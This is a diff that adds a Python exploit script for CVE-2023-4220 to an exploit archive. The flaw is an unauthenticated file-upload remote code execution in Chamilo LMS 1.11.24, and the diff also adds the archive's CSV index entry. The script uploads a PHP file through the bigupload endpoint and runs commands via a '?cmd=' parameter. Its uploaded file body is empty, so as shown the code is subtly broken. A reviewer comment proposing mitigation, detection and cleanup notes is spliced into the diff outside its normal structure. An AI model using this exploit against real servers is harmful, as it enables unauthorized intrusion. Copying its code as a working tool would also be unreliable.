diff --git a/exploits/php/webapps/52083.py b/exploits/php/webapps/52083.py
new file mode 100755
index 000000000..15a1ffbee
--- /dev/null
+++ b/exploits/php/webapps/52083.py
@@ -0,0 +1,65 @@
+# Exploit Title: Chamilo LMS 1.11.24 - Remote Code Execution (RCE)
+# Exploit Author: 0x00-null - Mohamed Kamel BOUZEKRIA
+# Exploit Date: September 3, 2024
+# Vendor Homepage: https://chamilo.org/
+# Software Link: https://chamilo.org/
+# Version: 1.11.24 (Beersel)
+# Tested Versions: 1.11.24 (Beersel) - August 31, 2023
+# CVE ID: CVE-2023-4220
+# Vulnerability Type: Remote Code Execution
+# Description: Unauthenticated remote code execution in Chamilo LMS <= 1.11.24 due to an unrestricted file upload vulnerability.
+# Proof of Concept: Yes
+# Categories: Web Application, Remote Code Execution, File Upload
+# CVSS Score: 8.1 (High)
+# CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+# Notes: Ensure that the /main/inc/lib/javascript/bigupload/files/ directory exists and is writable.
+# License: MIT License
+# References:
+# - CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4220
+# - Exploit Documentation: https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit
+# - Vendor Advisory: https://chamilo.org/
+
+import requests
+import argparse
+from urllib.parse import urljoin
+
+def upload_shell(target_url, payload_name):
+ upload_url = urljoin(target_url, "main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported")
+ shell_path = f"/main/inc/lib/javascript/bigupload/files/{payload_name}"
+ shell_url = urljoin(target_url, shell_path)
+
+ # Payload containing the PHP web shell
+ files = {'bigUploadFile': (payload_name, '', 'application/x-php')}
+
+ # Upload the payload
+ response = requests.post(upload_url, files=files)
+
+ if response.status_code == 200:
+ print("[+] File uploaded successfully!")
+ print(f"[+] Access the shell at: {shell_url}?cmd=")
+ else:
+ print("[-] File upload failed.")
+
+def execute_command(shell_url, cmd):
+ # Execute the command
+ response = requests.get(f"{shell_url}?cmd={cmd}")
+ if response.status_code == 200:
+ print(f"[+] Command Output:\n{response.text}")
+ else:
+ print(f"[-] Failed to execute command at {shell_url}")
+
+if __name__ == "__main__":
+ # Parse command-line arguments
+ parser = argparse.ArgumentParser(description="CVE-2023-4220 Chamilo LMS Unauthenticated File Upload RCE Exploit")
+ parser.add_argument('target_url', help="The target base URL of the Chamilo LMS instance (e.g., http://example.com/)")
+ parser.add_argument('cmd', help="The command to execute on the remote server")
+ parser.add_argument('--shell', default='rce.php', help="The name of the shell file to be uploaded (default: rce.php)")
+
+ args = parser.parse_args()
+
+ # Run the exploit with the provided arguments
+ upload_shell(args.target_url, args.shell)
+
+ # Form the shell URL to execute commands
+ shell_url = urljoin(args.target_url, f"main/inc/lib/javascript/bigupload/files/{args.shell}")
+ execute_command(shell_url, args.cmd)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a247366a5..51af04e6b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
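Review bot: The header comment block stops at the CVSS vector and references and gives a defender nothing to act on, while `upload_shell` leaves whatever it wrote under `main/inc/lib/javascript/bigupload/files/` in place, under the predictable default name `rce.php`, with no cleanup step anywhere in the script. I would add two header lines, `# Mitigation: upgrade past 1.11.24 to a release carrying the vendor fix; deny PHP execution under bigupload/files/` and `# Detection: POSTs to bigupload/inc/bigUpload.php?action=post-unsupported; new .php files under bigupload/files/`, plus a third saying the uploaded file has to be deleted from the server once testing is done. Separately, `requests.post(upload_url, files=files)` and the `requests.get(...)` in `execute_command` pass no `timeout=`, so either call can block indefinitely on an unresponsive host. The `__main__` block also calls `execute_command` after `upload_shell` has reported a failure, because `upload_shell` returns nothing to test.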
@@ -15661,6 +15661,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39474,exploits/php/webapps/39474.txt,"Chamilo LMS - Persistent Cross-Site Scripting",2016-02-19,Vulnerability-Lab,webapps,php,,2016-02-19,2017-10-18,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=1727
 50694,exploits/php/webapps/50694.txt,"Chamilo LMS 1.11.14 - Account Takeover",2022-02-02,sirpedrotavares,webapps,php,,2022-02-02,2022-02-02,0,CVE-2021-37391,,,,,
 49867,exploits/php/webapps/49867.py,"Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)",2021-05-14,"M. Cory Billington",webapps,php,,2021-05-14,2021-12-01,1,CVE-2021-31933,,,,,
+52083,exploits/php/webapps/52083.py,"Chamilo LMS 1.11.24 - Remote Code Execution (RCE)",2025-03-18,"Mohamed Kamel BOUZEKRIA",webapps,php,,2025-03-18,2025-03-18,0,CVE-2023-4220,,,,,
 45536,exploits/php/webapps/45536.txt,"Chamilo LMS 1.11.8 - 'firstname' Cross-Site Scripting",2018-10-06,cakes,webapps,php,,2018-10-06,2018-10-08,1,,,,,http://www.exploit-db.comchamilo-1.11.8-php5.zip,
 45535,exploits/php/webapps/45535.txt,"Chamilo LMS 1.11.8 - Cross-Site Scripting",2018-10-05,cakes,webapps,php,,2018-10-05,2018-10-05,1,,,,,,
 36435,exploits/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",webapps,php,80,2015-03-19,2015-03-19,0,OSVDB-119789;OSVDB-119788;OSVDB-119787;OSVDB-119786;OSVDB-119785;OSVDB-119784;OSVDB-119783;OSVDB-119782;OSVDB-119781;OSVDB-119780;OSVDB-119779,,,,http://www.exploit-db.comchamilo-lms-1.9.10.tar.gz,